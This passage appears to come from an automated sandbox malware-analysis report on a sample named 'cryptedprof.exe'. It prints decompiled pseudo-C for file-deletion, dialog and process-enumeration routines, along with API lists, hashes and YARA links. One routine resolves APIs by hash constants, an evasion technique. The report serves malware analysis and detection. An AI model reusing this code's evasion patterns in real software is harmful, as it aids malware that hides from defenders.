                                                                                        • Instruction ID: 0eb489f93b75c153dc6b26d6e6db38d16840880e50e366dcb4a34bccc71ed4ec
                                                                                        • Opcode Fuzzy Hash: edc0389ecf1a22d82b6c5f4aac84a7ca59b5b8469aa6f4230c5c5590d305fd91
                                                                                        • Instruction Fuzzy Hash: AC22AB71D2420ADFDB12CFA4C9807EDBBF9FB85304F20852ED1A6A6280D7745981CB5B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD3(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4e8 =  *0x42f4e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624D(0x42b8c0, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C2C(_t73);
					} else {
						lstrcatA(0x42b8c0, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E0040624D(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059CD(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405374(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4e8 =  *0x42f4e8 + 1;
										} else {
											E00405374(0xfffffff1, _t73);
											E0040602C(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A15(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b8c0 - 0x5c;
					if( *0x42b8c0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065C1(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE5(_t73);
							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405374(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405374(0xfffffff1, _t73);
							return E0040602C(_t72, _t73, 0);
						}
						L33:
						 *0x42f4e8 =  *0x42f4e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                                        0x00405a1f
                                                                                        0x00405a24
                                                                                        0x00405a2d
                                                                                        0x00405a30
                                                                                        0x00405a38
                                                                                        0x00405a3b
                                                                                        0x00405a3e
                                                                                        0x00405a46
                                                                                        0x00405a48
                                                                                        0x00405a49
                                                                                        0x00000000
                                                                                        0x00405a49
                                                                                        0x00405a54
                                                                                        0x00405a57
                                                                                        0x00405a57
                                                                                        0x00405a57
                                                                                        0x00405a5b
                                                                                        0x00405a6e
                                                                                        0x00405a75
                                                                                        0x00405a7a
                                                                                        0x00405a7e
                                                                                        0x00405a8e
                                                                                        0x00405a80
                                                                                        0x00405a86
                                                                                        0x00405a86
                                                                                        0x00405a93
                                                                                        0x00405a96
                                                                                        0x00405aa1
                                                                                        0x00405aa7
                                                                                        0x00405aac
                                                                                        0x00405abc
                                                                                        0x00405abe
                                                                                        0x00405ac4
                                                                                        0x00405ac7
                                                                                        0x00405aca
                                                                                        0x00405b82
                                                                                        0x00405b82
                                                                                        0x00405b86
                                                                                        0x00405b88
                                                                                        0x00405b88
                                                                                        0x00405b88
                                                                                        0x00405b88
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405ad0
                                                                                        0x00405ad0
                                                                                        0x00405ad9
                                                                                        0x00405adf
                                                                                        0x00405ae4
                                                                                        0x00405ae7
                                                                                        0x00405ae9
                                                                                        0x00405aed
                                                                                        0x00405aef
                                                                                        0x00405aef
                                                                                        0x00405aed
                                                                                        0x00405af2
                                                                                        0x00405af5
                                                                                        0x00405b08
                                                                                        0x00405b0a
                                                                                        0x00405b0f
                                                                                        0x00405b16
                                                                                        0x00405b31
                                                                                        0x00405b36
                                                                                        0x00405b38
                                                                                        0x00405b5c
                                                                                        0x00405b3a
                                                                                        0x00405b3a
                                                                                        0x00405b3d
                                                                                        0x00405b51
                                                                                        0x00405b3f
                                                                                        0x00405b42
                                                                                        0x00405b4a
                                                                                        0x00405b4a
                                                                                        0x00405b3d
                                                                                        0x00405b18
                                                                                        0x00405b1e
                                                                                        0x00405b20
                                                                                        0x00405b26
                                                                                        0x00405b26
                                                                                        0x00405b20
                                                                                        0x00000000
                                                                                        0x00405b16
                                                                                        0x00405af7
                                                                                        0x00405afa
                                                                                        0x00405afc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405afe
                                                                                        0x00405b00
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405b02
                                                                                        0x00405b06
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405b61
                                                                                        0x00405b6b
                                                                                        0x00405b71
                                                                                        0x00405b71
                                                                                        0x00405b7c
                                                                                        0x00000000
                                                                                        0x00405b7c
                                                                                        0x00405a98
                                                                                        0x00405a9f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405a5d
                                                                                        0x00405a5d
                                                                                        0x00405a5f
                                                                                        0x00405b8c
                                                                                        0x00405b8e
                                                                                        0x00405b91
                                                                                        0x00405be2
                                                                                        0x00405be2
                                                                                        0x00405be2
                                                                                        0x00405b93
                                                                                        0x00405b96
                                                                                        0x00405ba1
                                                                                        0x00405ba6
                                                                                        0x00405ba8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405bab
                                                                                        0x00405bb7
                                                                                        0x00405bbc
                                                                                        0x00405bbe
                                                                                        0x00000000
                                                                                        0x00405bd9
                                                                                        0x00405bc0
                                                                                        0x00405bc3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405bc8
                                                                                        0x00000000
                                                                                        0x00405bcf
                                                                                        0x00405b98
                                                                                        0x00405b98
                                                                                        0x00000000
                                                                                        0x00405b98
                                                                                        0x00405a65
                                                                                        0x00405a68
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405a68

                                                                                        APIs
                                                                                        • DeleteFileA.KERNELBASE(?,?,747DFA90,747DF560,00000000), ref: 00405A3E
                                                                                        • lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,747DFA90,747DF560,00000000), ref: 00405A86
                                                                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,747DFA90,747DF560,00000000), ref: 00405AA7
                                                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,747DFA90,747DF560,00000000), ref: 00405AAD
                                                                                        • FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,747DFA90,747DF560,00000000), ref: 00405ABE
                                                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
                                                                                        • FindClose.KERNEL32(00000000), ref: 00405B7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                        • String ID: "C:\Users\user\Desktop\cryptedprof.exe" $\*.*
                                                                                        • API String ID: 2035342205-371768168
                                                                                        • Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                        • Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
                                                                                        • Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                        • Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FC2421B, Relevance: 4.6, APIs: 3, Instructions: 52processCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E6FC2421B(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v544;
				void* _v580;
				struct tagPROCESSENTRY32W* _t25;

				_v8 = E6FC24582();
				_v16 = E6FC2462A(_v8, 0xea31d3b6);
				_v20 = E6FC2462A(_v8, 0x5c7bf6e9);
				_v24 = E6FC2462A(_v8, 0x873d1860);
				_v12 = CreateToolhelp32Snapshot(2, 0);
				if(_v12 != 0xffffffff) {
					_v580 = 0x22c;
					_t25 =  &_v580;
					Process32FirstW(_v12, _t25);
					if(_t25 != 0) {
						while(E6FC241D7( &_v544) != _a4) {
							if(Process32NextW(_v12,  &_v580) != 0) {
								continue;
							}
							return 0;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}











                                                                                        0x6fc24229
                                                                                        0x6fc24239
                                                                                        0x6fc24249
                                                                                        0x6fc24259
                                                                                        0x6fc24263
                                                                                        0x6fc2426a
                                                                                        0x6fc24270
                                                                                        0x6fc2427a
                                                                                        0x6fc24284
                                                                                        0x6fc24289
                                                                                        0x6fc2428f
                                                                                        0x6fc242b4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fc242b6
                                                                                        0x00000000
                                                                                        0x6fc242a2
                                                                                        0x00000000
                                                                                        0x6fc2428b
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 6FC24260
                                                                                        • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 6FC24284
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 2353314856-0
                                                                                        • Opcode ID: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                                        • Instruction ID: 13e3f2ee87e6a63454a066b9022399f06dab4a47d75d3f3862c96b8db34f7e65
                                                                                        • Opcode Fuzzy Hash: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                                        • Instruction Fuzzy Hash: 0F112770D00219BFDB10DFB1CD49AAEBBF8FF00304F1045A5E919E5091F7325A959B51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004065C1, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004065C1(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c108;
			}




                                                                                        0x004065cc
                                                                                        0x004065d5
                                                                                        0x00000000
                                                                                        0x004065e2
                                                                                        0x004065d8
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • FindFirstFileA.KERNELBASE(747DFA90,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,747DFA90,?,747DF560,00405A35,?,747DFA90,747DF560), ref: 004065CC
                                                                                        • FindClose.KERNEL32(00000000), ref: 004065D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                        • Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
                                                                                        • Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                        • Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403DFD, Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 84%
                                                                                        			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a8a0 = _t35;
					if(_t116 == 0x110) {
						 *0x42f448 = _t126;
						 *0x42a8b4 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429880 = _t92;
						E004042D1(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28); // executed
						 *0x42ec0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a8a0 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f480;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E0040431D(0x40b);
						while(1) {
							_t37 =  *0x42a8a0;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x42f484;
							if(_t39 ==  *0x42f484) {
								E0040140B(1);
							}
							__eflags =  *0x42ec0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D1(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ec - _t134;
							_v32 = _t49;
							if( *0x42f4ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042F3(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429880, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ec - _t134;
							if( *0x42f4ec == _t134) {
								_push( *0x42a8b4);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429880);
							}
							E00404306();
							E0040624D(0x42a8b8, E00403DDE());
							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a8b8);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ec18);
									 *0x42a090 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ec18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D1(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ec0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ec18, 8);
									E0040431D(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ec - _t134;
								if( *0x42f4ec != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4e0 - _t134;
								if( *0x42f4e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ec18);
						 *0x42f448 = _t134;
						EndDialog(_t126,  *0x429c88);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ec18, 0x40f, 0, 1);
						__eflags =  *0x42ec0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404338(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ec - _t134;
										if( *0x42f4ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c88 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AA();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c88 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ec18);
						 *0x42ec18 = _a12;
						L58:
						if( *0x42b8b8 == _t134) {
							_t143 =  *0x42ec18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b8b8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                                        0x00403e06
                                                                                        0x00403e0f
                                                                                        0x00403f50
                                                                                        0x00403f54
                                                                                        0x00403f58
                                                                                        0x00403f5a
                                                                                        0x00403f5f
                                                                                        0x00403f6a
                                                                                        0x00403f75
                                                                                        0x00403f7a
                                                                                        0x00403f7c
                                                                                        0x00403f7e
                                                                                        0x00403f81
                                                                                        0x00403f86
                                                                                        0x00403f94
                                                                                        0x00403fa1
                                                                                        0x00403fa8
                                                                                        0x00403fa8
                                                                                        0x00403fa9
                                                                                        0x00403fa9
                                                                                        0x00403fae
                                                                                        0x00403fb4
                                                                                        0x00403fbb
                                                                                        0x00403fc1
                                                                                        0x00403fc3
                                                                                        0x00404003
                                                                                        0x00404008
                                                                                        0x0040400d
                                                                                        0x0040400d
                                                                                        0x00404012
                                                                                        0x0040401b
                                                                                        0x0040401d
                                                                                        0x00404022
                                                                                        0x00404028
                                                                                        0x0040402c
                                                                                        0x0040402c
                                                                                        0x00404031
                                                                                        0x00404037
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404042
                                                                                        0x00404048
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404051
                                                                                        0x00404059
                                                                                        0x0040405e
                                                                                        0x00404061
                                                                                        0x00404067
                                                                                        0x0040406c
                                                                                        0x0040406f
                                                                                        0x00404075
                                                                                        0x0040407a
                                                                                        0x0040407d
                                                                                        0x00404083
                                                                                        0x0040408b
                                                                                        0x00404091
                                                                                        0x00404097
                                                                                        0x0040409b
                                                                                        0x004040a2
                                                                                        0x004040a2
                                                                                        0x004040a2
                                                                                        0x004040ac
                                                                                        0x004040be
                                                                                        0x004040ca
                                                                                        0x004040cf
                                                                                        0x004040d9
                                                                                        0x004040df
                                                                                        0x004040e1
                                                                                        0x004040e6
                                                                                        0x004040e3
                                                                                        0x004040e3
                                                                                        0x004040e3
                                                                                        0x004040f6
                                                                                        0x0040410e
                                                                                        0x00404110
                                                                                        0x00404116
                                                                                        0x0040412b
                                                                                        0x00404118
                                                                                        0x00404121
                                                                                        0x00404123
                                                                                        0x00404123
                                                                                        0x00404131
                                                                                        0x00404142
                                                                                        0x00404153
                                                                                        0x0040415a
                                                                                        0x00404160
                                                                                        0x00404164
                                                                                        0x00404169
                                                                                        0x0040416b
                                                                                        0x00000000
                                                                                        0x00404171
                                                                                        0x00404171
                                                                                        0x00404173
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404179
                                                                                        0x0040417d
                                                                                        0x004041a2
                                                                                        0x004041a8
                                                                                        0x004041ae
                                                                                        0x004041b0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004041d6
                                                                                        0x004041dc
                                                                                        0x004041de
                                                                                        0x004041e3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004041e9
                                                                                        0x004041ec
                                                                                        0x004041ef
                                                                                        0x00404206
                                                                                        0x00404212
                                                                                        0x0040422b
                                                                                        0x00404231
                                                                                        0x00404235
                                                                                        0x0040423a
                                                                                        0x00404240
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040424a
                                                                                        0x00404255
                                                                                        0x00000000
                                                                                        0x00404255
                                                                                        0x0040417f
                                                                                        0x00404185
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040418b
                                                                                        0x00404191
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404197
                                                                                        0x0040416b
                                                                                        0x00404262
                                                                                        0x0040426e
                                                                                        0x00404275
                                                                                        0x00000000
                                                                                        0x00403fc5
                                                                                        0x00403fc5
                                                                                        0x00403fc8
                                                                                        0x00403ffb
                                                                                        0x00403ffb
                                                                                        0x00403ffd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403ffd
                                                                                        0x00403fca
                                                                                        0x00403fce
                                                                                        0x00403fd3
                                                                                        0x00403fd5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403fe5
                                                                                        0x00403fed
                                                                                        0x00000000
                                                                                        0x00403ff3
                                                                                        0x00403e21
                                                                                        0x00403e21
                                                                                        0x00403e25
                                                                                        0x00403e2a
                                                                                        0x00403e39
                                                                                        0x00403e39
                                                                                        0x00403e42
                                                                                        0x00403e4b
                                                                                        0x00403e56
                                                                                        0x00403e56
                                                                                        0x00403e62
                                                                                        0x00403e7e
                                                                                        0x00403e81
                                                                                        0x00403e94
                                                                                        0x00403e9a
                                                                                        0x00403f3d
                                                                                        0x00000000
                                                                                        0x00403f46
                                                                                        0x00403ea0
                                                                                        0x00403ead
                                                                                        0x00403eaf
                                                                                        0x00403eb1
                                                                                        0x00403ed0
                                                                                        0x00403ed0
                                                                                        0x00403ed3
                                                                                        0x00403ed8
                                                                                        0x00403edb
                                                                                        0x00403eeb
                                                                                        0x00403eec
                                                                                        0x00403eee
                                                                                        0x00403f24
                                                                                        0x00403f37
                                                                                        0x00000000
                                                                                        0x00403f37
                                                                                        0x00403ef0
                                                                                        0x00403ef6
                                                                                        0x00403f0f
                                                                                        0x00403f14
                                                                                        0x00403f16
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403f18
                                                                                        0x00403f04
                                                                                        0x00403f04
                                                                                        0x00403f06
                                                                                        0x00403f06
                                                                                        0x00000000
                                                                                        0x00403f06
                                                                                        0x00403ef9
